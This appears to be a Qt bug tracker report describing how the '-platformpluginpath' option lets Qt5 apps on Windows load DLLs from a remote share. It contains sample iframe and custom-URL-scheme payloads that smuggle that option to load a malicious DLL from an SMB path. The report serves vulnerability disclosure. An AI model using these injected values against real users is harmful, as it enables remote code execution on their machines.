Details
-
Bug
-
Resolution: Invalid
-
P2: Important
-
None
-
5.11
-
Windows
-
Windows
Description
The Qt5 application, depending on certain metadata, will automatically execute those plugins pointed by platformpluginpath as soon as they are loaded in memory.
For example,
myTest.exe -platformpluginpath C:/Path-of-library/specific
will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory.
<iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>
Now this remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Now since Qt Load plugins based on the metadata so dll name does not matter.
Another scenario:
if a user register custom URL scheme for one application in Windows, e.g.
app://. User has this application installed and URL scheme registered.
Create webpage with link to 'app://? "-platformpluginpath
\\SERVER\SharedFolder\"'.
When user opens such page on his PC and clicks this link your application is
started on bis machine and platform plugin is loaded from shared folder. This
platform plugin can be qwindows.dll with injected code.
.
There two nicely detailed article here about this potential dangerous situation:
https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-
cve-2019-1636-and-cve-2019-6739
https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-
to-remote-code-execution/